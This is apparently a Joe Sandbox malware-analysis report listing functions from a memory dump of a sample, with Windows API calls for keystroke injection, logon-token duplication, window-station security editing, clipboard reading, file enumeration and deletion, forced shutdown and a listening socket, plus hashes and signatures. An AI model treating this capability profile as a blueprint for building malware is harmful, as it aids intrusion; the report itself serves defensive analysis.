MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0F50B
keybd_event.USER32(00000012,00000000), ref: 00C0F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0F519
keybd_event.USER32(00000012,00000000), ref: 00C0F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0F528
keybd_event.USER32(00000012,00000000), ref: 00C0F52D
SetForegroundWindow.USER32(00000000), ref: 00C0F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C0F557

Strings

Shell_TrayWnd, xrefs: 00C0F46F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a39e61028d3f4c4838a31440bf5ce7b60a881add5d1fdf9b2c842a7c0df228f9
Instruction ID: e6ad013148663f523fc75457f2c879485ba6847c398b00b8859e48f911a91f0f
Opcode Fuzzy Hash: a39e61028d3f4c4838a31440bf5ce7b60a881add5d1fdf9b2c842a7c0df228f9
Instruction Fuzzy Hash: A6317275A41218BBEB306BB55C8AFBF7E6CFB45B50F100069FA00E61E1C6B06D41EA60

Function 00C11201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00C116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1170D
Part of subcall function 00C116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C1173A
Part of subcall function 00C116C3: GetLastError.KERNEL32 ref: 00C1174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C11286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C112A8
CloseHandle.KERNEL32(?), ref: 00C112B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C112D1
GetProcessWindowStation.USER32 ref: 00C112EA
SetProcessWindowStation.USER32(00000000), ref: 00C112F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C11310

Part of subcall function 00C110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C111FC), ref: 00C110D4
Part of subcall function 00C110BF: CloseHandle.KERNEL32(?,?,00C111FC), ref: 00C110E9

Strings

winsta0, xrefs: 00C112CC
, xrefs: 00C1125A
default, xrefs: 00C1130B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 0ae925320970e7a935959a8d56f573d78bbc0aaaf29e6daa878ed60c4311958a
Instruction ID: 8e976f47095fbc10ca37da522fc2286360b0a51f207509c5d33f1a873a062417
Opcode Fuzzy Hash: 0ae925320970e7a935959a8d56f573d78bbc0aaaf29e6daa878ed60c4311958a
Instruction Fuzzy Hash: 6981A271900209AFDF109FA4DC49FEE7BB9FF06704F184129FE20A61A0D7798A84DB61

Function 00C10B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11114
Part of subcall function 00C110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11120
Part of subcall function 00C110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C1112F
Part of subcall function 00C110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11136
Part of subcall function 00C110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C10BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C10C00
GetLengthSid.ADVAPI32(?), ref: 00C10C17
GetAce.ADVAPI32(?,00000000,?), ref: 00C10C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C10C6D
GetLengthSid.ADVAPI32(?), ref: 00C10C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C10C8C
HeapAlloc.KERNEL32(00000000), ref: 00C10C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C10CB4
CopySid.ADVAPI32(00000000), ref: 00C10CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C10CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C10D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C10D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10D45
HeapFree.KERNEL32(00000000), ref: 00C10D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10D55
HeapFree.KERNEL32(00000000), ref: 00C10D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10D65
HeapFree.KERNEL32(00000000), ref: 00C10D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00C10D78
HeapFree.KERNEL32(00000000), ref: 00C10D7F

Part of subcall function 00C11193: GetProcessHeap.KERNEL32(00000008,00C10BB1,?,00000000,?,00C10BB1,?), ref: 00C111A1
Part of subcall function 00C11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C10BB1,?), ref: 00C111A8
Part of subcall function 00C11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C10BB1,?), ref: 00C111B7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2f490a36e63641514ba8421c201cd08c78572552bdbed593799bdd2d1ea729f9
Instruction ID: 75dcbdb2deb27b699557aad378725cb98d873e3367811db36c683a94e60e6ab5
Opcode Fuzzy Hash: 2f490a36e63641514ba8421c201cd08c78572552bdbed593799bdd2d1ea729f9
Instruction Fuzzy Hash: 1C717E7590120AABDF10DFA4DC84BEEBBB8BF06300F148515E914A61A1D7B5AA85DBA0

Function 00C2EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C4CC08), ref: 00C2EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C2EB37
GetClipboardData.USER32(0000000D), ref: 00C2EB43
CloseClipboard.USER32 ref: 00C2EB4F
GlobalLock.KERNEL32(00000000), ref: 00C2EB87
CloseClipboard.USER32 ref: 00C2EB91
GlobalUnlock.KERNEL32(00000000), ref: 00C2EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00C2EBC9
GetClipboardData.USER32(00000001), ref: 00C2EBD1
GlobalLock.KERNEL32(00000000), ref: 00C2EBE2
GlobalUnlock.KERNEL32(00000000), ref: 00C2EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00C2EC38
GetClipboardData.USER32(0000000F), ref: 00C2EC44
GlobalLock.KERNEL32(00000000), ref: 00C2EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C2EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C2EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C2ECD2
GlobalUnlock.KERNEL32(00000000), ref: 00C2ECF3
CountClipboardFormats.USER32 ref: 00C2ED14
CloseClipboard.USER32 ref: 00C2ED59

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 33a942cf6b7902f653fadd89a0f3ddb8d7239d22040f7e20d5b53515f2479f7a
Instruction ID: 36193ca4cd80d6c99340e456361d9a29b66046f7f6031b649d55590950e9dd5d
Opcode Fuzzy Hash: 33a942cf6b7902f653fadd89a0f3ddb8d7239d22040f7e20d5b53515f2479f7a
Instruction Fuzzy Hash: 9A61BF342042019FD310EF24E885FBE7BE4BF85714F184559F856A76A2CBB1DE45CB62

Function 00C2698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C269BE
FindClose.KERNEL32(00000000), ref: 00C26A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C26A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C26A75

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00C26AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C26ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C26B6A
%03d, xrefs: 00C26DA2
%02d, xrefs: 00C26C00, 00C26C0A, 00C26C5A, 00C26CAA, 00C26CFA, 00C26D4A
%4d, xrefs: 00C26BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00C26B32

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: c2038c5fc4e133c97ce4f90d3bf8321f085263c6a8c41998b3f4a1858c1d679b
Instruction ID: c78b16351ad6b6b023709ca5d583934b3769f099c5671e9fafe7a77024051152
Opcode Fuzzy Hash: c2038c5fc4e133c97ce4f90d3bf8321f085263c6a8c41998b3f4a1858c1d679b
Instruction Fuzzy Hash: A2D14E72508300AFC714EBA4D891EBFB7ECAF88704F44495DF589D6191EBB4DA48CB62

Function 00C29642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C29663
GetFileAttributesW.KERNEL32(?), ref: 00C296A1
SetFileAttributesW.KERNEL32(?,?), ref: 00C296BB
FindNextFileW.KERNEL32(00000000,?), ref: 00C296D3
FindClose.KERNEL32(00000000), ref: 00C296DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00C296FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2974A
SetCurrentDirectoryW.KERNEL32(00C76B7C), ref: 00C29768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C29772
FindClose.KERNEL32(00000000), ref: 00C2977F
FindClose.KERNEL32(00000000), ref: 00C2978F

Strings

*.*, xrefs: 00C296F5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 2e8a4a69af8b780ca4d629518b3e25431957df8a6b2bb8a186ad25fd1b8d833c
Instruction ID: 79973da53a30c825208723e689243cb5a8a14950a7a78fd2aeb5881e2751c443
Opcode Fuzzy Hash: 2e8a4a69af8b780ca4d629518b3e25431957df8a6b2bb8a186ad25fd1b8d833c
Instruction Fuzzy Hash: 4031D5365016296BDB60EFB5EC49BDE77BCEF0A320F104166F915E21A0EB74DE448A14

Function 00C2979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C297BE
FindNextFileW.KERNEL32(00000000,?), ref: 00C29819
FindClose.KERNEL32(00000000), ref: 00C29824
FindFirstFileW.KERNEL32(*.*,?), ref: 00C29840
SetCurrentDirectoryW.KERNEL32(?), ref: 00C29890
SetCurrentDirectoryW.KERNEL32(00C76B7C), ref: 00C298AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C298B8
FindClose.KERNEL32(00000000), ref: 00C298C5
FindClose.KERNEL32(00000000), ref: 00C298D5

Part of subcall function 00C1DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C1DB00

Strings

*.*, xrefs: 00C2983B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 5a6fe00c87fb28633c3a046c46e39fb5c796e0ba7b85d4107ec37136561b759a
Instruction ID: 59dbbb366865751826e9c3beb31b622a0f27fe228dec6a996a5affcd9e1b4e3d
Opcode Fuzzy Hash: 5a6fe00c87fb28633c3a046c46e39fb5c796e0ba7b85d4107ec37136561b759a
Instruction Fuzzy Hash: 0D31D6355016296BDB24EFB5EC88BDE77BCEF07320F144166E924E21E1DB70DA44CA24

Function 00C28195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C28257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C28267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C28273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C28310
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28324
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C2838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28395

Strings

*.*, xrefs: 00C2839B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 628ec36fd28e6faa6f32187136c21619fbd21573f64bc133c131b20cb4538f8a
Instruction ID: a27f08964f93cbc7aeda5f7c6a3affea2415cbe7aa72bf2eb7ac87e12459f5b0
Opcode Fuzzy Hash: 628ec36fd28e6faa6f32187136c21619fbd21573f64bc133c131b20cb4538f8a
Instruction Fuzzy Hash: BD618F725043159FC710EF64D840AAEB3E8FF89310F04895EF999C7261EB75E949CB92

Function 00C1D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB3A97,?,?,00BB2E7F,?,?,?,00000000), ref: 00BB3AC2

Part of subcall function 00C1E199: GetFileAttributesW.KERNEL32(?,00C1CF95), ref: 00C1E19A

FindFirstFileW.KERNEL32(?,?), ref: 00C1D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C1D1DD
MoveFileW.KERNEL32(?,?), ref: 00C1D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C1D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1D237

Part of subcall function 00C1D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C1D21C,?,?), ref: 00C1D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00C1D253
FindClose.KERNEL32(00000000), ref: 00C1D264

Strings

\*.*, xrefs: 00C1D0CD, 00C1D0D6, 00C1D0EB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: a064811a7851f04734788d76a8bf74439048c626c19b285bc42831b1829aa5e1
Instruction ID: f2c6b907a6fe04eb11c2cc9695ba42b026b4e4477ea720971a8360eeccf623b4
Opcode Fuzzy Hash: a064811a7851f04734788d76a8bf74439048c626c19b285bc42831b1829aa5e1
Instruction Fuzzy Hash: 00614C3180110DABCF15EBE4DD92AFDB7B5AF16300F2441A5E412771A2EB70AF49EB61

Function 00C2ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C2ED91
EmptyClipboard.USER32 ref: 00C2ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00C2EDAC
CloseClipboard.USER32 ref: 00C2EEA3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bd02e964135344dd5acc104a393039db510fa01c14e21983ea7407b13c1c8176
Instruction ID: 8a45f15de67492ade3f9a344c53eb223a21085ec79ea0791b7675e1574b4db0f
Opcode Fuzzy Hash: bd02e964135344dd5acc104a393039db510fa01c14e21983ea7407b13c1c8176
Instruction Fuzzy Hash: A341BD35205621AFD320CF15E888B69BBE5FF45318F15C099E4299BB72C775ED41CB90

Function 00C1E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1170D
Part of subcall function 00C116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C1173A
Part of subcall function 00C116C3: GetLastError.KERNEL32 ref: 00C1174A

ExitWindowsEx.USER32(?,00000000), ref: 00C1E932

Strings

, xrefs: 00C1E95C
, xrefs: 00C1E920
SeShutdownPrivilege, xrefs: 00C1E902
@, xrefs: 00C1E925

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 88aca2eb08c85d2cc700af018115e37e8d61eddb06460256e65630a4204a252b
Instruction ID: 0a08a7c762c50c260cd82cbd38b39ae68fa240cd94944e68809d6421fb879a68
Opcode Fuzzy Hash: 88aca2eb08c85d2cc700af018115e37e8d61eddb06460256e65630a4204a252b
Instruction Fuzzy Hash: F1014932A10311ABEB6422B59CC6FFF725CAB0A750F184422FD13E20E1D5A55DC0B2A0

Function 00C31204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C31276
WSAGetLastError.WSOCK32 ref: 00C31283
bind.WSOCK32(00000000,?,00000010), ref: 00C312BA
WSAGetLastError.WSOCK32 ref: 00C312C5
closesocket.WSOCK32(00000000), ref: 00C312F4
listen.WSOCK32(00000000,00000005), ref: 00C31303
WSAGetLastError.WSOCK32 ref: 00C3130D
closesocket.WSOCK32(00000000), ref: 00C3133C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: cd85aa78ef6e54d71b4f900fe084797f4eb11335b38cbe98d29727476a4a134f
Instruction ID: 93aeac77cc90433c16d95ed85085ccaf671056426310e24a294811fc4baaddbd
Opcode Fuzzy Hash: cd85aa78ef6e54d71b4f900fe084797f4eb11335b38cbe98d29727476a4a134f
Instruction Fuzzy Hash: DB417F35A001409FD710DF64C488B6ABBE5BF86318F188198E8669F2E7C771ED85CBE1

Function 00BEB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BEB9D4
_free.LIBCMT ref: 00BEB9F8
_free.LIBCMT ref: 00BEBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C53700), ref: 00BEBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00C8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BEBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00C81270,000000FF,?,0000003F,00000000,?), ref: 00BEBC36
_free.LIBCMT ref: 00BEBD4B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 64087830c858c709acb1f0a31a77607598e7092daf55b95a6112dedb3270b193
Instruction ID: c3f9938be724c8dbba2a2227ebd36984c9f5baa1f69c6209eeba5b6ada1f9b44
Opcode Fuzzy Hash: 64087830c858c709acb1f0a31a77607598e7092daf55b95a6112dedb3270b193
Instruction Fuzzy Hash: 7FC11775904285AFDB249F7A8C41FAF7BF9EF41310F1841EAE894D7252EB309E418B94

Function 00C1D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

